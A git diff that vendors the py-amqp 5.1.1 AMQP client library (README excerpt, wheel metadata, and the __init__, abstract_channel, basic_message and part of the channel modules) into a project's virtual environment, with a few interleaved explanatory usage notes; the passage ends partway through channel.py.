``Connection.connection_errors`` and ``.channel_errors``, + a list of recoverable errors. +- Exposes the underlying socket as ``Connection.sock``. +- Adds ``Channel.no_ack_consumers`` to keep track of consumer tags + that set the no_ack flag. +- Slightly better at error recovery + +Quick overview +============== + +Simple producer publishing messages to ``test`` queue using default exchange: + +.. code:: python + + import amqp + + with amqp.Connection('broker.example.com') as c: + ch = c.channel() + ch.basic_publish(amqp.Message('Hello World'), routing_key='test') + +Producer publishing to ``test_exchange`` exchange with publisher confirms enabled and using virtual_host ``test_vhost``: + +.. code:: python + + import amqp + + with amqp.Connection( + 'broker.example.com', exchange='test_exchange', + confirm_publish=True, virtual_host='test_vhost' + ) as c: + ch = c.channel() + ch.basic_publish(amqp.Message('Hello World'), routing_key='test') + +Consumer with acknowledgments enabled: + +.. code:: python + + import amqp + + with amqp.Connection('broker.example.com') as c: + ch = c.channel() + def on_message(message): + print('Received message (delivery tag: {}): {}'.format(message.delivery_tag, message.body)) + ch.basic_ack(message.delivery_tag) + ch.basic_consume(queue='test', callback=on_message) + while True: + c.drain_events() + + +Consumer with acknowledgments disabled: + +.. code:: python + + import amqp + + with amqp.Connection('broker.example.com') as c: + ch = c.channel() + def on_message(message): + print('Received message (delivery tag: {}): {}'.format(message.delivery_tag, message.body)) + ch.basic_consume(queue='test', callback=on_message, no_ack=True) + while True: + c.drain_events() + +Speedups +======== + +This library has **experimental** support of speedups. Speedups are implemented using Cython. To enable speedups, ``CELERY_ENABLE_SPEEDUPS`` environment variable must be set during building/installation. +Currently speedups can be installed: + +1. using source package (using ``--no-binary`` switch): + +.. code:: shell + + CELERY_ENABLE_SPEEDUPS=true pip install --no-binary :all: amqp + + +2. building directly source code: + +.. 
code:: shell + + CELERY_ENABLE_SPEEDUPS=true python setup.py install + +Further +======= + +- Differences between AMQP 0.8 and 0.9.1 + + http://www.rabbitmq.com/amqp-0-8-to-0-9-1.html + +- AMQP 0.9.1 Quick Reference + + http://www.rabbitmq.com/amqp-0-9-1-quickref.html + +- RabbitMQ Extensions + + http://www.rabbitmq.com/extensions.html + +- For more information about AMQP, visit + + http://www.amqp.org + +- For other Python client libraries see: + + http://www.rabbitmq.com/devtools.html#python-dev + +.. |build-status| image:: https://api.travis-ci.com/celery/py-amqp.png?branch=master + :alt: Build status + :target: https://travis-ci.com/celery/py-amqp + +.. |coverage| image:: https://codecov.io/github/celery/py-amqp/coverage.svg?branch=master + :target: https://codecov.io/github/celery/py-amqp?branch=master + +.. |license| image:: https://img.shields.io/pypi/l/amqp.svg + :alt: BSD License + :target: https://opensource.org/licenses/BSD-3-Clause + +.. |wheel| image:: https://img.shields.io/pypi/wheel/amqp.svg + :alt: Python AMQP can be installed via wheel + :target: https://pypi.org/project/amqp/ + +.. |pyversion| image:: https://img.shields.io/pypi/pyversions/amqp.svg + :alt: Supported Python versions. + :target: https://pypi.org/project/amqp/ + +.. |pyimp| image:: https://img.shields.io/pypi/implementation/amqp.svg + :alt: Support Python implementations. + :target: https://pypi.org/project/amqp/ + +py-amqp as part of the Tidelift Subscription +============================================ + +The maintainers of py-amqp and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. 
[Learn more.](https://tidelift.com/subscription/pkg/pypi-amqp?utm_source=pypi-amqp&utm_medium=referral&utm_campaign=readme&utm_term=repo) + + + diff --git a/env/Lib/site-packages/amqp-5.1.1.dist-info/RECORD b/env/Lib/site-packages/amqp-5.1.1.dist-info/RECORD new file mode 100644 index 00000000..5b60e942 --- /dev/null +++ b/env/Lib/site-packages/amqp-5.1.1.dist-info/RECORD @@ -0,0 +1,34 @@ +amqp-5.1.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +amqp-5.1.1.dist-info/LICENSE,sha256=9e9fEoLq4ZMcdGRfhxm2xps9aizyd7_aJJqCcM1HOvM,2372 +amqp-5.1.1.dist-info/METADATA,sha256=U0V_hIpM3GJaDCdXXI_LGo1jZJFydz6_b29E2aohLmc,8867 +amqp-5.1.1.dist-info/RECORD,, +amqp-5.1.1.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +amqp-5.1.1.dist-info/top_level.txt,sha256=tWQNmFVhU4UtDgB6Yy2lKqRz7LtOrRcN8_bPFVcVVR8,5 +amqp/__init__.py,sha256=-o4VeUXiY-qfYQNUKLRc2ry9pYi6a4HEjMTwXsX_ios,2365 +amqp/__pycache__/__init__.cpython-310.pyc,, +amqp/__pycache__/abstract_channel.cpython-310.pyc,, +amqp/__pycache__/basic_message.cpython-310.pyc,, +amqp/__pycache__/channel.cpython-310.pyc,, +amqp/__pycache__/connection.cpython-310.pyc,, +amqp/__pycache__/exceptions.cpython-310.pyc,, +amqp/__pycache__/method_framing.cpython-310.pyc,, +amqp/__pycache__/platform.cpython-310.pyc,, +amqp/__pycache__/protocol.cpython-310.pyc,, +amqp/__pycache__/sasl.cpython-310.pyc,, +amqp/__pycache__/serialization.cpython-310.pyc,, +amqp/__pycache__/spec.cpython-310.pyc,, +amqp/__pycache__/transport.cpython-310.pyc,, +amqp/__pycache__/utils.cpython-310.pyc,, +amqp/abstract_channel.py,sha256=D_OEWvX48yKUzMYm_sN-IDRQmqIGvegi9KlJriqttBc,4941 +amqp/basic_message.py,sha256=Q8DV31tuuphloTETPHiJFwNg6b5M6pccJ0InJ4MZUz8,3357 +amqp/channel.py,sha256=XzCuKPy9qFMiTsnqksKpFIh9PUcKZm3uIXm1RFCeZQs,74475 +amqp/connection.py,sha256=e_FbJYzI1_ekUbWzlQ6kIHOn8sM2Npen10WH3TFv0A8,27347 +amqp/exceptions.py,sha256=yqjoFIRue2rvK7kMdvkKsGOD6dMOzzzT3ZzBwoGWAe4,7166 +amqp/method_framing.py,sha256=avnw90X9t4995HpHoZV4-1V73UEbzUKJ83pHEicAqWY,6734 +amqp/platform.py,sha256=cyLevv6E15P9zhMo_fV84p67Q_A8fdsTq9amjvlUwqE,2379 +amqp/protocol.py,sha256=Di3y6qqhnOV4QtkeYKO-zryfWqwl3F1zUxDOmVSsAp0,291 +amqp/sasl.py,sha256=6AbsnxlbAyoiYxDezoQTfm-E0t_TJyHXpqGJ0KlPkI4,5986 +amqp/serialization.py,sha256=xzzXmmQ45fGUuSCxGTEMizmRQTmzaz3Z7YYfpxmfXuY,17162 +amqp/spec.py,sha256=2ZjbL4FR4Fv67HA7HUI9hLUIvAv3A4ZH6GRPzrMRyWg,2121 +amqp/transport.py,sha256=MyiYBerBqAMFCM-fyZgPXiCha3dz-2S6Z9cGO8IZyTg,22826 +amqp/utils.py,sha256=JjjY040LwsDUc1zmKP2VTzXBioVXy48DUZtWB8PaPy0,1456 diff --git a/env/Lib/site-packages/amqp-5.1.1.dist-info/WHEEL b/env/Lib/site-packages/amqp-5.1.1.dist-info/WHEEL new file mode 100644 index 00000000..becc9a66 --- /dev/null +++ b/env/Lib/site-packages/amqp-5.1.1.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/amqp-5.1.1.dist-info/top_level.txt b/env/Lib/site-packages/amqp-5.1.1.dist-info/top_level.txt new file mode 100644 index 00000000..5e610d34 --- /dev/null +++ b/env/Lib/site-packages/amqp-5.1.1.dist-info/top_level.txt @@ -0,0 +1 @@ +amqp diff --git a/env/Lib/site-packages/amqp/__init__.py b/env/Lib/site-packages/amqp/__init__.py new file mode 100644 index 00000000..1899b52e --- /dev/null +++ b/env/Lib/site-packages/amqp/__init__.py @@ -0,0 +1,75 @@ +"""Low-level AMQP client for Python (fork of amqplib).""" +# Copyright (C) 2007-2008 Barry Pederson + +import re +from collections import namedtuple + +__version__ = 
'5.1.1' +__author__ = 'Barry Pederson' +__maintainer__ = 'Asif Saif Uddin, Matus Valo' +__contact__ = 'pyamqp@celeryproject.org' +__homepage__ = 'http://github.com/celery/py-amqp' +__docformat__ = 'restructuredtext' + +# -eof meta- + +version_info_t = namedtuple('version_info_t', ( + 'major', 'minor', 'micro', 'releaselevel', 'serial', +)) + +# bumpversion can only search for {current_version} +# so we have to parse the version here. +_temp = re.match( + r'(\d+)\.(\d+).(\d+)(.+)?', __version__).groups() +VERSION = version_info = version_info_t( + int(_temp[0]), int(_temp[1]), int(_temp[2]), _temp[3] or '', '') +del(_temp) +del(re) + +from .basic_message import Message # noqa +from .channel import Channel # noqa +from .connection import Connection # noqa +from .exceptions import (AccessRefused, AMQPError, # noqa + AMQPNotImplementedError, ChannelError, ChannelNotOpen, + ConnectionError, ConnectionForced, ConsumerCancelled, + ContentTooLarge, FrameError, FrameSyntaxError, + InternalError, InvalidCommand, InvalidPath, + IrrecoverableChannelError, + IrrecoverableConnectionError, NoConsumers, NotAllowed, + NotFound, PreconditionFailed, RecoverableChannelError, + RecoverableConnectionError, ResourceError, + ResourceLocked, UnexpectedFrame, error_for_code) +from .utils import promise # noqa + +__all__ = ( + 'Connection', + 'Channel', + 'Message', + 'promise', + 'AMQPError', + 'ConnectionError', + 'RecoverableConnectionError', + 'IrrecoverableConnectionError', + 'ChannelError', + 'RecoverableChannelError', + 'IrrecoverableChannelError', + 'ConsumerCancelled', + 'ContentTooLarge', + 'NoConsumers', + 'ConnectionForced', + 'InvalidPath', + 'AccessRefused', + 'NotFound', + 'ResourceLocked', + 'PreconditionFailed', + 'FrameError', + 'FrameSyntaxError', + 'InvalidCommand', + 'ChannelNotOpen', + 'UnexpectedFrame', + 'ResourceError', + 'NotAllowed', + 'AMQPNotImplementedError', + 'InternalError', + 'error_for_code', +) diff --git a/env/Lib/site-packages/amqp/abstract_channel.py b/env/Lib/site-packages/amqp/abstract_channel.py new file mode 100644 index 00000000..ae95a89e --- /dev/null +++ b/env/Lib/site-packages/amqp/abstract_channel.py @@ -0,0 +1,163 @@ +"""Code common to Connection and Channel objects.""" +# Copyright (C) 2007-2008 Barry Pederson ) + +import logging + +from vine import ensure_promise, promise + +from .exceptions import AMQPNotImplementedError, RecoverableConnectionError +from .serialization import dumps, loads + +__all__ = ('AbstractChannel',) + +AMQP_LOGGER = logging.getLogger('amqp') + +IGNORED_METHOD_DURING_CHANNEL_CLOSE = """\ +Received method %s during closing channel %s. This method will be ignored\ +""" + + +class AbstractChannel: + """Superclass for Connection and Channel. + + The connection is treated as channel 0, then comes + user-created channel objects. + + The subclasses must have a _METHOD_MAP class property, mapping + between AMQP method signatures and Python methods. 
+ """ + + def __init__(self, connection, channel_id): + self.is_closing = False + self.connection = connection + self.channel_id = channel_id + connection.channels[channel_id] = self + self.method_queue = [] # Higher level queue for methods + self.auto_decode = False + self._pending = {} + self._callbacks = {} + + self._setup_listeners() + + __slots__ = ( + "is_closing", + "connection", + "channel_id", + "method_queue", + "auto_decode", + "_pending", + "_callbacks", + # adding '__dict__' to get dynamic assignment + "__dict__", + "__weakref__", + ) + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + self.close() + + def send_method(self, sig, + format=None, args=None, content=None, + wait=None, callback=None, returns_tuple=False): + p = promise() + conn = self.connection + if conn is None: + raise RecoverableConnectionError('connection already closed') + args = dumps(format, args) if format else '' + try: + conn.frame_writer(1, self.channel_id, sig, args, content) + except StopIteration: + raise RecoverableConnectionError('connection already closed') + + # TODO temp: callback should be after write_method ... ;) + if callback: + p.then(callback) + p() + if wait: + return self.wait(wait, returns_tuple=returns_tuple) + return p + + def close(self): + """Close this Channel or Connection.""" + raise NotImplementedError('Must be overridden in subclass') + + def wait(self, method, callback=None, timeout=None, returns_tuple=False): + p = ensure_promise(callback) + pending = self._pending + prev_p = [] + if not isinstance(method, list): + method = [method] + + for m in method: + prev_p.append(pending.get(m)) + pending[m] = p + + try: + while not p.ready: + self.connection.drain_events(timeout=timeout) + + if p.value: + args, kwargs = p.value + args = args[1:] # We are not returning method back + return args if returns_tuple else (args and args[0]) + finally: + for i, m in enumerate(method): + if prev_p[i] is not None: + pending[m] = prev_p[i] + else: + pending.pop(m, None) + + def dispatch_method(self, method_sig, payload, content): + if self.is_closing and method_sig not in ( + self._ALLOWED_METHODS_WHEN_CLOSING + ): + # When channel.close() was called we must ignore all methods except + # Channel.close and Channel.CloseOk + AMQP_LOGGER.warning( + IGNORED_METHOD_DURING_CHANNEL_CLOSE, + method_sig, self.channel_id + ) + return + + if content and \ + self.auto_decode and \ + hasattr(content, 'content_encoding'): + try: + content.body = content.body.decode(content.content_encoding) + except Exception: + pass + + try: + amqp_method = self._METHODS[method_sig] + except KeyError: + raise AMQPNotImplementedError( + f'Unknown AMQP method {method_sig!r}') + + try: + listeners = [self._callbacks[method_sig]] + except KeyError: + listeners = [] + one_shot = None + try: + one_shot = self._pending.pop(method_sig) + except KeyError: + if not listeners: + return + + args = [] + if amqp_method.args: + args, _ = loads(amqp_method.args, payload, 4) + if amqp_method.content: + args.append(content) + + for listener in listeners: + listener(*args) + + if one_shot: + one_shot(method_sig, *args) + + #: Placeholder, the concrete implementations will have to + #: supply their own versions of _METHOD_MAP + _METHODS = {} diff --git a/env/Lib/site-packages/amqp/basic_message.py b/env/Lib/site-packages/amqp/basic_message.py new file mode 100644 index 00000000..cee0515d --- /dev/null +++ b/env/Lib/site-packages/amqp/basic_message.py @@ -0,0 +1,122 @@ +"""AMQP Messages.""" +# Copyright (C) 2007-2008 Barry 
Pederson +from .serialization import GenericContent +# Intended to fix #85: ImportError: cannot import name spec +# Encountered on python 2.7.3 +# "The submodules often need to refer to each other. For example, the +# surround [sic] module might use the echo module. In fact, such +# references are so common that the import statement first looks in +# the containing package before looking in the standard module search +# path." +# Source: +# http://stackoverflow.com/a/14216937/4982251 +from .spec import Basic + +__all__ = ('Message',) + + +class Message(GenericContent): + """A Message for use with the Channel.basic_* methods. + + Expected arg types + + body: string + children: (not supported) + + Keyword properties may include: + + content_type: shortstr + MIME content type + + content_encoding: shortstr + MIME content encoding + + application_headers: table + Message header field table, a dict with string keys, + and string | int | Decimal | datetime | dict values. + + delivery_mode: octet + Non-persistent (1) or persistent (2) + + priority: octet + The message priority, 0 to 9 + + correlation_id: shortstr + The application correlation identifier + + reply_to: shortstr + The destination to reply to + + expiration: shortstr + Message expiration specification + + message_id: shortstr + The application message identifier + + timestamp: unsigned long + The message timestamp + + type: shortstr + The message type name + + user_id: shortstr + The creating user id + + app_id: shortstr + The creating application id + + cluster_id: shortstr + Intra-cluster routing identifier + + Unicode bodies are encoded according to the 'content_encoding' + argument. If that's None, it's set to 'UTF-8' automatically. + + Example:: + + msg = Message('hello world', + content_type='text/plain', + application_headers={'foo': 7}) + """ + + CLASS_ID = Basic.CLASS_ID + + #: Instances of this class have these attributes, which + #: are passed back and forth as message properties between + #: client and server + PROPERTIES = [ + ('content_type', 's'), + ('content_encoding', 's'), + ('application_headers', 'F'), + ('delivery_mode', 'o'), + ('priority', 'o'), + ('correlation_id', 's'), + ('reply_to', 's'), + ('expiration', 's'), + ('message_id', 's'), + ('timestamp', 'L'), + ('type', 's'), + ('user_id', 's'), + ('app_id', 's'), + ('cluster_id', 's') + ] + + def __init__(self, body='', children=None, channel=None, **properties): + super().__init__(**properties) + #: set by basic_consume/basic_get + self.delivery_info = None + self.body = body + self.channel = channel + + __slots__ = ( + "delivery_info", + "body", + "channel", + ) + + @property + def headers(self): + return self.properties.get('application_headers') + + @property + def delivery_tag(self): + return self.delivery_info.get('delivery_tag') diff --git a/env/Lib/site-packages/amqp/channel.py b/env/Lib/site-packages/amqp/channel.py new file mode 100644 index 00000000..fffc7b8e --- /dev/null +++ b/env/Lib/site-packages/amqp/channel.py @@ -0,0 +1,2127 @@ +"""AMQP Channels.""" +# Copyright (C) 2007-2008 Barry Pederson + +import logging +import socket +from collections import defaultdict +from queue import Queue + +from vine import ensure_promise + +from . 
import spec +from .abstract_channel import AbstractChannel +from .exceptions import (ChannelError, ConsumerCancelled, MessageNacked, + RecoverableChannelError, RecoverableConnectionError, + error_for_code) +from .protocol import queue_declare_ok_t + +__all__ = ('Channel',) + +AMQP_LOGGER = logging.getLogger('amqp') + +REJECTED_MESSAGE_WITHOUT_CALLBACK = """\ +Rejecting message with delivery tag %r for reason of having no callbacks. +consumer_tag=%r exchange=%r routing_key=%r.\ +""" + + +class VDeprecationWarning(DeprecationWarning): + pass + + +class Channel(AbstractChannel): + """AMQP Channel. + + The channel class provides methods for a client to establish a + virtual connection - a channel - to a server and for both peers to + operate the virtual connection thereafter. + + GRAMMAR:: + + channel = open-channel *use-channel close-channel + open-channel = C:OPEN S:OPEN-OK + use-channel = C:FLOW S:FLOW-OK + / S:FLOW C:FLOW-OK + / functional-class + close-channel = C:CLOSE S:CLOSE-OK + / S:CLOSE C:CLOSE-OK + + Create a channel bound to a connection and using the specified + numeric channel_id, and open on the server. + + The 'auto_decode' parameter (defaults to True), indicates + whether the library should attempt to decode the body + of Messages to a Unicode string if there's a 'content_encoding' + property for the message. If there's no 'content_encoding' + property, or the decode raises an Exception, the message body + is left as plain bytes. + """ + + _METHODS = { + spec.method(spec.Channel.Close, 'BsBB'), + spec.method(spec.Channel.CloseOk), + spec.method(spec.Channel.Flow, 'b'), + spec.method(spec.Channel.FlowOk, 'b'), + spec.method(spec.Channel.OpenOk), + spec.method(spec.Exchange.DeclareOk), + spec.method(spec.Exchange.DeleteOk), + spec.method(spec.Exchange.BindOk), + spec.method(spec.Exchange.UnbindOk), + spec.method(spec.Queue.BindOk), + spec.method(spec.Queue.UnbindOk), + spec.method(spec.Queue.DeclareOk, 'sll'), + spec.method(spec.Queue.DeleteOk, 'l'), + spec.method(spec.Queue.PurgeOk, 'l'), + spec.method(spec.Basic.Cancel, 's'), + spec.method(spec.Basic.CancelOk, 's'), + spec.method(spec.Basic.ConsumeOk, 's'), + spec.method(spec.Basic.Deliver, 'sLbss', content=True), + spec.method(spec.Basic.GetEmpty, 's'), + spec.method(spec.Basic.GetOk, 'Lbssl', content=True), + spec.method(spec.Basic.QosOk), + spec.method(spec.Basic.RecoverOk), + spec.method(spec.Basic.Return, 'Bsss', content=True), + spec.method(spec.Tx.CommitOk), + spec.method(spec.Tx.RollbackOk), + spec.method(spec.Tx.SelectOk), + spec.method(spec.Confirm.SelectOk), + spec.method(spec.Basic.Ack, 'Lb'), + spec.method(spec.Basic.Nack, 'Lb'), + } + _METHODS = {m.method_sig: m for m in _METHODS} + + _ALLOWED_METHODS_WHEN_CLOSING = ( + spec.Channel.Close, spec.Channel.CloseOk + ) + + def __init__(self, connection, + channel_id=None, auto_decode=True, on_open=None): + if channel_id: + connection._claim_channel_id(channel_id) + else: + channel_id = connection._get_free_channel_id() + + AMQP_LOGGER.debug('using channel_id: %s', channel_id) + + super().__init__(connection, channel_id) + + self.is_open = False + self.active = True # Flow control + self.returned_messages = Queue() + self.callbacks = {} + self.cancel_callbacks = {} + self.auto_decode = auto_decode + self.events = defaultdict(set) + self.no_ack_consumers = set() + + self.on_open = ensure_promise(on_open) + + # set first time basic_publish_confirm is called + # and publisher confirms are enabled for this channel. 
+ self._confirm_selected = False + if self.connection.confirm_publish: + self.basic_publish = self.basic_publish_confirm + + __slots__ = ( + "is_open", + "active", + "returned_messages", + "callbacks", + "cancel_callbacks", + "events", + "no_ack_consumers", + "on_open", + "_confirm_selected", + ) + + def then(self, on_success, on_error=None): + return self.on_open.then(on_success, on_error) + + def _setup_listeners(self): + self._callbacks.update({ + spec.Channel.Close: self._on_close, + spec.Channel.CloseOk: self._on_close_ok, + spec.Channel.Flow: self._on_flow, + spec.Channel.OpenOk: self._on_open_ok, + spec.Basic.Cancel: self._on_basic_cancel, + spec.Basic.CancelOk: self._on_basic_cancel_ok, + spec.Basic.Deliver: self._on_basic_deliver, + spec.Basic.Return: self._on_basic_return, + spec.Basic.Ack: self._on_basic_ack, + spec.Basic.Nack: self._on_basic_nack, + }) + + def collect(self): + """Tear down this object. + + Best called after we've agreed to close with the server. + """ + AMQP_LOGGER.debug('Closed channel #%s', self.channel_id) + self.is_open = False + channel_id, self.channel_id = self.channel_id, None + connection, self.connection = self.connection, None + if connection: + connection.channels.pop(channel_id, None) + try: + connection._used_channel_ids.remove(channel_id) + except ValueError: + # channel id already removed + pass + self.callbacks.clear() + self.cancel_callbacks.clear() + self.events.clear() + self.no_ack_consumers.clear() + + def _do_revive(self): + self.is_open = False + self.open() + + def close(self, reply_code=0, reply_text='', method_sig=(0, 0), + argsig='BsBB'): + """Request a channel close. + + This method indicates that the sender wants to close the + channel. This may be due to internal conditions (e.g. a forced + shut-down) or due to an error handling a specific method, i.e. + an exception. When a close is due to an exception, the sender + provides the class and method id of the method which caused + the exception. + + RULE: + + After sending this method any received method except + Channel.Close-OK MUST be discarded. + + RULE: + + The peer sending this method MAY use a counter or timeout + to detect failure of the other peer to respond correctly + with Channel.Close-OK.. + + PARAMETERS: + reply_code: short + + The reply code. The AMQ reply codes are defined in AMQ + RFC 011. + + reply_text: shortstr + + The localised reply text. This text can be logged as an + aid to resolving issues. + + class_id: short + + failing method class + + When the close is provoked by a method exception, this + is the class of the method. + + method_id: short + + failing method ID + + When the close is provoked by a method exception, this + is the ID of the method. + """ + try: + if self.connection is None: + return + if self.connection.channels is None: + return + if not self.is_open: + return + + self.is_closing = True + return self.send_method( + spec.Channel.Close, argsig, + (reply_code, reply_text, method_sig[0], method_sig[1]), + wait=spec.Channel.CloseOk, + ) + finally: + self.is_closing = False + self.connection = None + + def _on_close(self, reply_code, reply_text, class_id, method_id): + """Request a channel close. + + This method indicates that the sender wants to close the + channel. This may be due to internal conditions (e.g. a forced + shut-down) or due to an error handling a specific method, i.e. + an exception. When a close is due to an exception, the sender + provides the class and method id of the method which caused + the exception. 
+ + RULE: + + After sending this method any received method except + Channel.Close-OK MUST be discarded. + + RULE: + + The peer sending this method MAY use a counter or timeout + to detect failure of the other peer to respond correctly + with Channel.Close-OK.. + + PARAMETERS: + reply_code: short + + The reply code. The AMQ reply codes are defined in AMQ + RFC 011. + + reply_text: shortstr + + The localised reply text. This text can be logged as an + aid to resolving issues. + + class_id: short + + failing method class + + When the close is provoked by a method exception, this + is the class of the method. + + method_id: short + + failing method ID + + When the close is provoked by a method exception, this + is the ID of the method. + """ + self.send_method(spec.Channel.CloseOk) + if not self.connection.is_closing: + self._do_revive() + raise error_for_code( + reply_code, reply_text, (class_id, method_id), ChannelError, + ) + + def _on_close_ok(self): + """Confirm a channel close. + + This method confirms a Channel.Close method and tells the + recipient that it is safe to release resources for the channel + and close the socket. + + RULE: + + A peer that detects a socket closure without having + received a Channel.Close-Ok handshake method SHOULD log + the error. + """ + self.collect() + + def flow(self, active): + """Enable/disable flow from peer. + + This method asks the peer to pause or restart the flow of + content data. This is a simple flow-control mechanism that a + peer can use to avoid overflowing its queues or otherwise + finding itself receiving more messages than it can process. + Note that this method is not intended for window control. The + peer that receives a request to stop sending content should + finish sending the current content, if any, and then wait + until it receives a Flow restart method. + + RULE: + + When a new channel is opened, it is active. Some + applications assume that channels are inactive until + started. To emulate this behaviour a client MAY open the + channel, then pause it. + + RULE: + + When sending content data in multiple frames, a peer + SHOULD monitor the channel for incoming methods and + respond to a Channel.Flow as rapidly as possible. + + RULE: + + A peer MAY use the Channel.Flow method to throttle + incoming content data for internal reasons, for example, + when exchanging data over a slower connection. + + RULE: + + The peer that requests a Channel.Flow method MAY + disconnect and/or ban a peer that does not respect the + request. + + PARAMETERS: + active: boolean + + start/stop content frames + + If True, the peer starts sending content frames. If + False, the peer stops sending content frames. + """ + return self.send_method( + spec.Channel.Flow, 'b', (active,), wait=spec.Channel.FlowOk, + ) + + def _on_flow(self, active): + """Enable/disable flow from peer. + + This method asks the peer to pause or restart the flow of + content data. This is a simple flow-control mechanism that a + peer can use to avoid overflowing its queues or otherwise + finding itself receiving more messages than it can process. + Note that this method is not intended for window control. The + peer that receives a request to stop sending content should + finish sending the current content, if any, and then wait + until it receives a Flow restart method. + + RULE: + + When a new channel is opened, it is active. Some + applications assume that channels are inactive until + started. To emulate this behaviour a client MAY open the + channel, then pause it. 
+ + RULE: + + When sending content data in multiple frames, a peer + SHOULD monitor the channel for incoming methods and + respond to a Channel.Flow as rapidly as possible. + + RULE: + + A peer MAY use the Channel.Flow method to throttle + incoming content data for internal reasons, for example, + when exchanging data over a slower connection. + + RULE: + + The peer that requests a Channel.Flow method MAY + disconnect and/or ban a peer that does not respect the + request. + + PARAMETERS: + active: boolean + + start/stop content frames + + If True, the peer starts sending content frames. If + False, the peer stops sending content frames. + """ + self.active = active + self._x_flow_ok(self.active) + + def _x_flow_ok(self, active): + """Confirm a flow method. + + Confirms to the peer that a flow command was received and + processed. + + PARAMETERS: + active: boolean + + current flow setting + + Confirms the setting of the processed flow method: + True means the peer will start sending or continue + to send content frames; False means it will not. + """ + return self.send_method(spec.Channel.FlowOk, 'b', (active,)) + + def open(self): + """Open a channel for use. + + This method opens a virtual connection (a channel). + + RULE: + + This method MUST NOT be called when the channel is already + open. + + PARAMETERS: + out_of_band: shortstr (DEPRECATED) + + out-of-band settings + + Configures out-of-band transfers on this channel. The + syntax and meaning of this field will be formally + defined at a later date. + """ + if self.is_open: + return + + return self.send_method( + spec.Channel.Open, 's', ('',), wait=spec.Channel.OpenOk, + ) + + def _on_open_ok(self): + """Signal that the channel is ready. + + This method signals to the client that the channel is ready + for use. + """ + self.is_open = True + self.on_open(self) + AMQP_LOGGER.debug('Channel open') + + ############# + # + # Exchange + # + # + # work with exchanges + # + # Exchanges match and distribute messages across queues. + # Exchanges can be configured in the server or created at runtime. + # + # GRAMMAR:: + # + # exchange = C:DECLARE S:DECLARE-OK + # / C:DELETE S:DELETE-OK + # + # RULE: + # + # The server MUST implement the direct and fanout exchange + # types, and predeclare the corresponding exchanges named + # amq.direct and amq.fanout in each virtual host. The server + # MUST also predeclare a direct exchange to act as the default + # exchange for content Publish methods and for default queue + # bindings. + # + # RULE: + # + # The server SHOULD implement the topic exchange type, and + # predeclare the corresponding exchange named amq.topic in + # each virtual host. + # + # RULE: + # + # The server MAY implement the system exchange type, and + # predeclare the corresponding exchanges named amq.system in + # each virtual host. If the client attempts to bind a queue to + # the system exchange, the server MUST raise a connection + # exception with reply code 507 (not allowed). + # + + def exchange_declare(self, exchange, type, passive=False, durable=False, + auto_delete=True, nowait=False, arguments=None, + argsig='BssbbbbbF'): + """Declare exchange, create if needed. + + This method creates an exchange if it does not already exist, + and if the exchange exists, verifies that it is of the correct + and expected class. + + RULE: + + The server SHOULD support a minimum of 16 exchanges per + virtual host and ideally, impose no limit except as + defined by available resources. 
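
As `_on_open_ok` above shows, a channel only becomes usable once the broker answers Channel.Open with Channel.OpenOk; `Connection.channel()` (defined further below) forwards an optional callback as the channel's `on_open` promise. A small sketch, assuming `conn` is an already-connected `amqp.Connection`; the `announce` function is illustrative:

```python
def announce(channel):
    # Invoked via _on_open_ok once the broker confirms Channel.Open.
    print('channel ready, id =', channel.channel_id)

ch = conn.channel(callback=announce)   # claims a free channel id and opens it
assert ch.is_open                      # set to True by _on_open_ok
```
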
+ + PARAMETERS: + exchange: shortstr + + RULE: + + Exchange names starting with "amq." are reserved + for predeclared and standardised exchanges. If + the client attempts to create an exchange starting + with "amq.", the server MUST raise a channel + exception with reply code 403 (access refused). + + type: shortstr + + exchange type + + Each exchange belongs to one of a set of exchange + types implemented by the server. The exchange types + define the functionality of the exchange - i.e. how + messages are routed through it. It is not valid or + meaningful to attempt to change the type of an + existing exchange. + + RULE: + + If the exchange already exists with a different + type, the server MUST raise a connection exception + with a reply code 507 (not allowed). + + RULE: + + If the server does not support the requested + exchange type it MUST raise a connection exception + with a reply code 503 (command invalid). + + passive: boolean + + do not create exchange + + If set, the server will not create the exchange. The + client can use this to check whether an exchange + exists without modifying the server state. + + RULE: + + If set, and the exchange does not already exist, + the server MUST raise a channel exception with + reply code 404 (not found). + + durable: boolean + + request a durable exchange + + If set when creating a new exchange, the exchange will + be marked as durable. Durable exchanges remain active + when a server restarts. Non-durable exchanges + (transient exchanges) are purged if/when a server + restarts. + + RULE: + + The server MUST support both durable and transient + exchanges. + + RULE: + + The server MUST ignore the durable field if the + exchange already exists. + + auto_delete: boolean + + auto-delete when unused + + If set, the exchange is deleted when all queues have + finished using it. + + RULE: + + The server SHOULD allow for a reasonable delay + between the point when it determines that an + exchange is not being used (or no longer used), + and the point when it deletes the exchange. At + the least it must allow a client to create an + exchange and then bind a queue to it, with a small + but non-zero delay between these two actions. + + RULE: + + The server MUST ignore the auto-delete field if + the exchange already exists. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + + arguments: table + + arguments for declaration + + A set of arguments for the declaration. The syntax and + semantics of these arguments depends on the server + implementation. This field is ignored if passive is + True. + """ + self.send_method( + spec.Exchange.Declare, argsig, + (0, exchange, type, passive, durable, auto_delete, + False, nowait, arguments), + wait=None if nowait else spec.Exchange.DeclareOk, + ) + + def exchange_delete(self, exchange, if_unused=False, nowait=False, + argsig='Bsbb'): + """Delete an exchange. + + This method deletes an exchange. When an exchange is deleted + all queue bindings on the exchange are cancelled. + + PARAMETERS: + exchange: shortstr + + RULE: + + The exchange MUST exist. Attempting to delete a + non-existing exchange causes a channel exception. + + if_unused: boolean + + delete only if unused + + If set, the server will only delete the exchange if it + has no queue bindings. 
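
Putting `exchange_declare` and `exchange_delete` together: the sketch below declares a durable topic exchange, re-checks it with `passive=True`, and finally removes it only while nothing is bound to it. The exchange name `'logs'` is illustrative and `ch` is an open channel:

```python
ch.exchange_declare('logs', 'topic', durable=True, auto_delete=False)

# passive=True only verifies existence and type; a missing exchange raises
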